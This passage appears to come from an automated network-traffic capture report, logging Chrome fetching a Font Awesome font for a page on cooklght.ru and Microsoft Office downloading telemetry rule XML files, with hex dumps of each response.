                                                                            2024-10-28 08:37:07 UTC1369INData Raw: cc ef c8 8d 13 76 42 6e 92 f8 e3 68 f4 34 e2 9f 8b 46 4f 27 de 2c 34 7a 39 31 6f a0 d1 1b 89 f1 d1 e8 33 c4 ff 19 8d ae fd 4f 8a b9 98 12 4c b5 b5 5c 6d ca 44 24 6c c8 30 e4 79 90 d7 b3 9e b4 d1 d7 a8 67 41 9e d6 d3 9e 2c c8 fb 1a 7d 69 96 0f 34 f3 2c 6b e6 9b 67 b5 b4 96 f6 64 e5 a0 1c 6c 9e 0d d6 07 eb 3d 0b 5b ad 56 ab fe e4 93 4f b6 46 96 8f 8c 8c 8c 34 9e 7c f2 c9 91 d6 e4 0f 8a e2 44 9b 25 71 24 45 71 32 f9 55 12 47 9a 5d 14 45 31 f9 df ec a2 68 17 45 a1 ce a2 5d 14 dd 49 1c 49 51 9c 4c 1e 92 c4 91 14 c5 89 6e 03 f0 a6 fe 9d fa 8a 9d 75 1b 55 b6 80 e9 33 ea 59 36 d8 b7 45 50 ae f6 64 49 5a 6b 0c e5 cd e1 1e bf 99 37 eb 83 f5 72 50 4e 6b e9 c2 30 8c e3 30 0c c3 38 0e c3 cd d2 ce 4a a5 33 4d 3b 2b 95 ce 54 cb e3 30 0c c3 78 8a 38 0c c3 30 16 93 87 68
                                                                            Data Ascii: vBnh4FO',4z91o3OL\mD$l0ygA,}i4,kgdl=[VOF4|D%q$Eq2UG]E1hE]IIQLnuU3Y6EPdIZk7rPNk008J3M;+T0x80h


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            63192.168.2.449831104.17.25.144431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:07 UTC649OUTGET /ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2 HTTP/1.1
                                                                            Host: cdnjs.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            Origin: https://cooklght.ru
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: font
                                                                            Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:37:07 UTC979INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:07 GMT
                                                                            Content-Type: application/octet-stream; charset=utf-8
                                                                            Content-Length: 116672
                                                                            Connection: close
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: public, max-age=30672000
                                                                            ETag: "656632a7-1c7c0"
                                                                            Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                            cf-cdnjs-via: cfworker/kv
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Timing-Allow-Origin: *
                                                                            X-Content-Type-Options: nosniff
                                                                            CF-Cache-Status: HIT
                                                                            Age: 224965
                                                                            Expires: Sat, 18 Oct 2025 08:37:07 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FnFYHc7LZDlvU1RBYTVjvRUhpUzWsYdA%2F3ry6NeHMsA%2FKflbrAQ3WYL1NimaehBN7EiifQ3hYVD22ZUSVGAuAL8CDV1S2dT0asohjjyYpnAN5X5AUjTYyqGQLareshCI1jxM%2F2H8"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                            Strict-Transport-Security: max-age=15780000
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999a21eb446b31-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:37:07 UTC390INData Raw: 77 4f 46 32 00 01 00 00 00 01 c7 c0 00 0a 00 00 00 03 0e 91 00 01 c7 73 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 90 48 00 a5 56 ca 8b cc 10 cb 90 4c 05 88 1d 07 20 25 48 87 71 6a 08 dd 30 3d 00 00 b4 fa 79 50 46 f4 a4 d5 e2 01 50 55 55 4f 09 61 5e db f6 2a 20 fc f4 cb 6f 7f fc e5 6f ff f8 d7 7f fe f7 97 81 b1 3b 20 96 ed b8 9e 6f f8 ff 7e bf d7 75 f6 7f 2f c0 ec 62 93 f6 96 59 d6 75 2a e3 4b b7 a0 aa be 90 11 32 aa 80 77 fc 1f 5f 09 e8 82 70 96 d8 b4 ac 9d e8 31 d1 6e 2f a2 ce 8b 98 d3 09 2f 46 92 a3 74 f6 e5 01 e4 4f ec 65 2e d2 89 3a 81 e8 d4 dd b9 c9 3f 01 9e a7 9c e6 fb ce c6 aa bc 96 42 b2 55 e0 80 0a 34 01 a9 84 47 22 bb 40 37 e0 1b 91 4a c0 49 f6 54 5a 42 9e 91 c7 cb ff 87 33 fd 9f 3b a0 11
                                                                            Data Ascii: wOF2s6$ `HVL %Hqj0=yPFPUUOa^* oo; o~u/bYu*K2w_p1n//FtOe.:?BU4G"@7JITZB3;
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: 67 95 35 16 76 17 95 45 34 79 e0 81 1f 44 43 74 91 10 31 62 7c e2 2f 01 12 f2 95 e8 d7 24 c4 9d d8 bc ff 1f a7 e5 bf fb 24 bd 27 59 b2 08 6d d9 92 2c c9 b1 e3 c4 b2 ad c8 c1 81 74 93 81 cd 2c 36 8b 90 a5 4e 69 b6 e5 f9 29 21 66 97 e7 b4 b3 2d 4f 11 3e 20 27 3f cf cf 9a 7f cf d5 a7 92 bc 98 bc c9 4c 32 93 97 e4 e5 65 44 57 d9 65 97 15 63 59 d8 c5 a5 e2 f3 ff 87 2a d4 a9 d3 42 9d f6 0b fd 0a d5 2d 35 a3 d4 8c 2f 66 19 ff ff 69 9a de f7 ff cc ff 33 ac 61 69 24 db b2 25 5b 36 cb 80 4b f6 02 60 80 c0 61 07 78 83 ec b6 09 3b 05 4c d8 a7 71 4e 5d 76 79 0b ec 02 6f 43 08 ff cf f3 67 fe 3a bb 33 05 a7 f2 ad 94 49 95 0a 1c 64 a0 97 9f bc 5a fa 94 fc ef 7b 2b ad f6 40 02 65 46 56 f7 cc b4 d4 39 32 46 c8 75 81 a3 e5 56 69 db d7 39 f7 fd c5 7d ef 7f b3 79 df 3d 16 df
                                                                            Data Ascii: g5vE4yDCt1b|/$$'Ym,t,6Ni)!f-O> '?L2eDWecY*B-5/fi3ai$%[6K`ax;LqN]vyoCg:3IdZ{+@eFV92FuVi9}y=
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: 21 a8 00 1d a1 07 f4 84 5e d0 1b fa 40 5f e8 07 fd 61 00 0c 84 41 30 18 86 c0 50 18 06 c3 61 04 8c 84 51 30 1a c6 c0 58 18 07 e3 61 02 4c cc 57 22 5f ab 7c ad f3 b5 c9 d7 2e df 6a cd 4f 8b d0 1c 5a 56 ad 81 d6 52 6b a7 cd d2 e6 39 ff 27 3e 4b aa 9e d4 3d e9 7d b2 92 5c 31 b9 61 f2 fa e4 8d c9 db 52 4a a4 0c 4f 39 92 72 57 0f d2 e3 f5 42 7a 31 bd 8a 5e c3 e8 67 0c 30 66 18 8b 8c 15 c6 46 e3 b5 e1 c4 08 cc 8f 05 b1 2c 56 c6 36 d8 11 fb e2 00 1c 88 43 71 04 8e c4 d1 38 15 a7 e3 2c 5c 8c ab 70 1d 6e c4 2d 78 00 cf e2 15 7c 84 6f f1 07 fe 45 13 d3 c8 4e 01 24 28 9a 8a 53 49 2a 47 55 a9 31 75 a5 1e 34 88 86 d2 70 9a 4a 33 68 01 ad a0 55 b4 9a d6 d3 46 da 43 07 e9 10 1d a1 53 74 8e ee d0 07 fa 42 1a 77 e6 31 3c 85 55 9e cd f3 78 29 af e5 0d bc 95 77 f1 09 be cc
                                                                            Data Ascii: !^@_aA0PaQ0XaLW"_|.jOZVRk9'>K=}\1aRJO9rWBz1^g0fF,V6Cq8,\pn-x|oEN$(SI*GU1u4pJ3hUFCStBw1<Ux)w
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: 0b df 99 63 35 16 2d 33 c7 ea 2c da 66 8e 35 58 f4 e9 1c 6b b2 b8 fd 1c 6b b1 78 d6 1c 6b b3 78 b5 39 d6 61 f1 a5 73 ac cb e2 cb e7 58 8f c5 d7 8c 61 7d 96 4c 60 c9 44 6c c0 92 7d 68 4c 1b b1 e4 0e 96 dc 85 8d 59 f2 12 4b 5e c6 69 dc a8 f0 18 b6 a0 d1 83 46 6f 6c 49 63 34 0d b1 2d 8d b1 34 c6 63 b8 ab 31 9b c6 dc a3 ab b1 0c 8d 65 f1 18 37 77 7e cc d1 86 e6 ae 43 b4 a6 79 2c cd e3 f0 19 37 cf e0 39 f6 a0 79 de 10 7b d2 bc 94 e6 e5 98 ec 6a be 47 f3 43 dc c5 cd 05 c7 1c 07 92 3a cf 71 10 69 c4 1c 5d 48 a3 be f2 a5 96 71 9a c6 43 1c 4c 9a 4d 9a 83 b5 38 6d c8 73 b4 24 6d 36 c7 61 a4 9d c6 08 b7 90 76 26 ed 8a c3 49 bb 11 ca e3 ef 4e da 0b 47 91 f6 21 ed 8b e3 48 fb f1 1e 3a 9e b4 3f e9 00 9c 40 3a 94 74 14 4e 22 1d 43 3a 16 67 90 4e a0 31 9c 45 3a 95 74 26
                                                                            Data Ascii: c5-3,f5Xkkxkx9asXa}L`Dl}hLYK^iFolIc4-4c1e7w~Cy,79y{jGC:qi]HqCLM8ms$m6av&ING!H:?@:tN"C:gN1E:t&
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: 9e ef 38 39 f7 cc 29 37 2f 29 15 4a ea 37 af 66 9d 7c a9 54 ba b5 74 ab d4 c3 27 c4 76 e4 c1 13 2e e7 50 a2 89 ec f8 6f 49 f5 b5 39 e1 72 13 57 5a 9e 8c c7 e3 f1 73 65 d3 b3 e7 53 d8 82 29 7a 35 42 7e 5f 69 1d 85 a1 ee 67 9b 3a d2 4a 47 2a e2 06 37 d2 54 27 dc f0 4a 16 29 a5 fb b8 11 7d 7d 6e f0 50 07 dc 88 bb 69 32 18 e8 cd 78 53 c7 5a eb 24 fd df 15 b6 4e 55 54 e4 be 7d a4 24 4d b5 d6 9b 75 ae 49 91 17 03 bd 55 e4 d9 c4 b5 2c 4c 60 53 72 13 13 c7 76 37 36 9b 0b 40 28 76 aa 9a 40 a4 aa 41 e4 0a c3 f0 2a b5 a0 ba aa ff 51 10 c0 af d5 43 c1 28 33 84 23 bd 30 2c eb 46 0d 63 42 ec 9a 26 51 b5 1a 44 52 72 e6 fb b5 40 59 96 0b 53 cb 72 97 c0 24 8e ed 4a ce b1 c9 a5 28 97 98 c1 4b 02 98 69 0a b7 de 68 2f fa be 6d 92 8e 6b 59 96 e5 c6 84 73 cb 10 42 0a ca 18 37
                                                                            Data Ascii: 89)7/)J7f|Tt'v.PoI9rWZseS)z5B~_ig:JG*7T'J)}}nPi2xSZ$NUT}$MuIU,L`Srv76@(v@A*QC(3#0,FcB&QDRr@YSr$J(Kih/mkYsB7
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: de fe ec e1 55 f1 bb f7 ff 0f 86 a0 94 71 21 c4 6c ea 01 78 30 12 42 70 78 8e 10 82 df 76 1b 17 42 08 4a d9 c4 f6 7d 7b c2 28 15 31 52 55 46 23 f8 14 8c 50 88 56 b2 b6 d3 77 22 51 27 b3 dc 7d 27 d4 d8 cd 5c e1 60 83 38 eb 6c 22 db 0c b7 e7 9b a6 7f c1 03 46 b5 66 30 ce a3 f7 8d 9a 38 c4 34 c3 29 ed a1 82 f6 78 e5 89 84 51 2a 80 cf 1e cb e2 1b 60 f4 e7 66 36 7d 7c 8c ca f3 3d d8 84 09 3a 84 2e c2 63 46 ff 38 d4 51 a0 27 96 12 a7 e2 7c 80 c8 ec 15 26 d2 6e f7 73 d9 31 70 b2 69 76 16 56 52 60 03 47 9d fd 0b a5 72 5b 27 43 d8 7c 52 92 04 8d b9 9b 76 fd 85 fa 26 94 d5 89 20 cd 46 65 61 a1 43 9b b4 14 e1 19 53 90 2b 3b 62 84 e6 53 8c 60 8a 4e a2 9b 10 02 16 b1 14 a9 48 a1 29 f8 f2 81 94 fc db b0 0e 32 0f 36 66 44 b3 33 c3 10 43 1e 21 49 93 54 25 3c 73 3d ba 32
                                                                            Data Ascii: Uq!lx0BpxvBJ}{(1RUF#PVw"Q'}'\`8l"Ff084)xQ*`f6}|=:.cF8Q'|&ns1pivVR`Gr['C|Rv& FeaCS+;bS`NH)26fD3C!IT%<s=2
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: 8c 3d fe cc 53 3b 70 35 c1 e6 d5 cb b5 2a e0 e5 7d 87 cf 4e d6 75 55 04 10 a9 2e 18 85 d3 c0 1a be b6 23 8f f3 52 6f 29 5e 3f bc 6f 19 ef 4d 20 52 dd ae 8a c0 f7 c8 ff 0c 76 e0 43 e8 69 a9 04 97 5b 56 9b 3a ca 0a 94 d8 33 af b5 7b ec 62 a6 42 26 dc eb 22 fb 4d bd 07 b8 cc 82 d2 a9 9f 5f 46 b0 a9 25 69 a1 b9 4e f8 13 9b 94 30 2a 17 0f 60 a8 35 ea aa ea 4a c3 1d 16 27 fc 6a 2d 60 14 83 34 47 3e 28 8e e4 16 40 e0 07 72 bb 7d 9f 7f e2 dc 6e bb c3 e2 84 13 46 42 72 83 50 c7 91 76 10 d8 8c 6d b7 e1 3a d9 08 2c db aa b8 c0 2d bb 54 5e 6c 2e 8d aa 91 20 26 e7 18 80 09 47 4a 83 51 4c c0 e0 06 36 dd 8f 22 63 23 a5 04 30 7a e4 c7 95 dc 20 84 50 dc 6a 99 25 fe f0 f0 63 98 a0 18 93 0c 44 9e 14 85 84 82 08 ca 45 13 ec 91 9a 72 d0 67 ca e7 18 dc ef 09 97 7c cb 12 e6 f4
                                                                            Data Ascii: =S;p5*}NuU.#Ro)^?oM RvCi[V:3{bB&"M_F%iN0*`5J'j-`4G>(@r}nFBrPvm:,-T^l. &GJQL6"c#0z Pj%cDErg|
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: 9a 8d 46 58 2f 71 d3 ae 54 02 e8 76 fb 44 6f 9e 37 d2 9b 44 df 57 4e 61 0a 53 74 0c 21 5f a5 83 4f 18 2c 1f 59 14 7a a0 b9 0e 75 a1 07 3a 57 6a 50 9d c5 df 51 ba d0 d5 20 a6 e4 0b 40 85 5a e9 81 4e 75 f8 3f 27 4f 9e a4 f4 0c a3 bb 94 9e fc d6 65 98 9d 61 60 9c bc ec 5b df ba ec a4 01 ec 0c c3 97 7d 0b 9e b4 be be 4e e9 01 8c 0f 50 ba 7e fa 25 ff be 7e 93 81 0f 60 76 96 c1 c6 fa 4b 5e b2 be 01 ec 2c c3 07 b0 71 d3 fa bf bf e4 34 42 88 20 34 f7 03 d6 55 50 0d e5 08 f5 04 b4 89 f1 95 5b 69 92 f6 3c cf eb 68 8f 70 41 1b 0f ea f5 0e 8e cc 7e a0 0b 58 71 64 e0 4a 29 83 50 ba 86 e1 cc 7e 0c d3 8b 06 83 01 94 97 1b 51 28 1c 47 84 51 bd ec 4a 71 e0 f3 86 94 41 24 5d d7 0d 85 e3 18 ff 3c 1b c1 74 3e c6 7d d5 86 2b 23 b5 b0 10 29 29 19 13 97 89 2b 7d c5 af b8 84 40
                                                                            Data Ascii: FX/qTvDo7DWNaSt!_O,Yzu:WjPQ @ZNu?'Oea`[}NP~%~`vK^,q4B 4UP[i<hpA~XqdJ)P~Q(GQJqA$]<t>}+#))+}@
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: 00 7e 1c fb 87 8c c3 86 e9 38 66 70 c7 1d 77 dc f1 ca ed 67 08 31 09 d9 1d 47 dc 15 ee c2 13 78 12 df 8d 67 f0 0b f8 3d 6a d2 88 a6 84 8c 8a a4 c8 e7 92 6e b9 50 33 35 0b 9a ab b2 42 a5 2a 5f 0f e5 db 01 79 db ec f6 c2 66 92 35 93 2a 2d 8a 0a ea 48 25 b2 cb 03 17 a5 4a b3 f5 b9 91 54 a1 12 f2 e7 27 6a 12 25 49 a2 86 7f e4 27 9b 64 52 a5 ef 9d 50 4e a2 8b 98 b2 44 85 52 0e 53 77 12 15 47 81 7e 31 51 61 f4 ec cb e4 f2 43 3e 86 d5 db 81 ea b6 b0 3d 89 92 c7 ce 34 99 96 60 30 46 a5 a6 c9 44 25 2a 2e a7 55 a5 16 65 a2 a4 76 63 5a 3e cd 9d 57 6a 56 2e aa 46 a1 de 0e 14 b7 4d 17 66 65 f5 a8 f3 4b 3d e3 a2 60 72 6b e6 b3 42 e6 d2 41 66 31 0d c9 8b 52 4d e7 73 35 93 3e 34 50 04 c7 c2 f5 99 96 4a 48 f7 4b f7 a2 52 2a 4e b2 d1 d5 a5 8a 93 a2 92 a8 3a ed 9c 42 5e 15
                                                                            Data Ascii: ~8fpwg1Gxg=jnP35B*_yf5*-H%JT'j%I'dRPNDRSwG~1QaC>=4`0FD%*.UevcZ>WjV.FMfeK=`rkBAf1RMs5>4PJHKR*N:B^
                                                                            2024-10-28 08:37:07 UTC1369INData Raw: 7f 79 d1 8b 5e f4 c2 a7 b6 bf b5 7d d3 f7 be f7 bd 7f f9 e5 77 bf fb dd 6f 43 8a 0f 5d 5a cc bf 0a ff 05 df 42 4f 40 a8 97 0c b4 de f2 5e f1 62 82 8e 6e c6 04 ae b0 c6 dc 12 78 11 a9 13 f0 01 83 ad 41 32 15 0d c4 25 d8 58 5f 14 c0 9f 76 3c cf 71 9a ad d5 0b cf 3b 6f 41 62 22 29 75 aa aa d5 c5 38 ea b6 30 76 a4 a4 18 db 96 69 db e5 b2 5b 62 98 38 9e e7 3a 04 07 65 e1 18 06 00 70 a3 cc ad 52 c5 0f 03 21 4b 1c 53 29 84 00 db 76 38 7d e2 62 ab d5 5b 5d 5d ed 74 dd 60 b1 79 fe 52 d2 6a 38 4e d2 6c f9 91 65 01 f6 00 18 37 0d 4a c3 7a 3d f4 6c ab e2 59 84 f9 81 ef 87 f5 4e ad cc 0d af ec 12 e6 56 2a 96 59 e2 b6 5f 2e 03 8b 54 c5 24 84 73 8c 85 6d 5b 26 a5 08 21 86 d0 9c b7 32 b4 84 5a 68 1b 9d 44 bb 08 f5 44 58 40 ba d8 2a 9d f6 ce 8b 4e a7 03 d0 c0 81 68 7d fe
                                                                            Data Ascii: y^}woC]ZBO@^bnxA2%X_v<q;oAb")u80vi[b8:epR!KS)v8}b[]]t`yRj8Nle7Jz=lYNV*Y_.T$sm[&!2ZhDDX@*Nh}


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            64192.168.2.44983613.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:07 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:07 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:07 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 471
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                            ETag: "0x8DC582BB5815C4C"
                                                                            x-ms-request-id: ff77512b-301e-000c-17f4-24323f000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083707Z-15b8d89586fsx9lfqmgrbzpgmg0000000nf0000000009sc2
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:07 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            65192.168.2.44983713.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:07 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:07 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:07 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 419
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                            x-ms-request-id: 128a8aa7-901e-005b-27fd-272005000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083707Z-15b8d89586fmhkw429ba5n22m8000000065g000000004t07
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:07 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            66192.168.2.44983813.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:07 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:07 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:07 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 494
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                            ETag: "0x8DC582BB8972972"
                                                                            x-ms-request-id: 3a46b3a2-501e-008f-78cb-279054000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083707Z-15b8d89586fdmfsg1u7xrpfws0000000092g000000003tt8
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:07 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            67192.168.2.44983513.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:07 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:07 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:07 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 415
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                            ETag: "0x8DC582B988EBD12"
                                                                            x-ms-request-id: 546431bf-201e-0085-0b72-2734e3000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083707Z-15b8d89586f6nn8zb8x99wuenc00000005rg0000000081dc
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:07 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
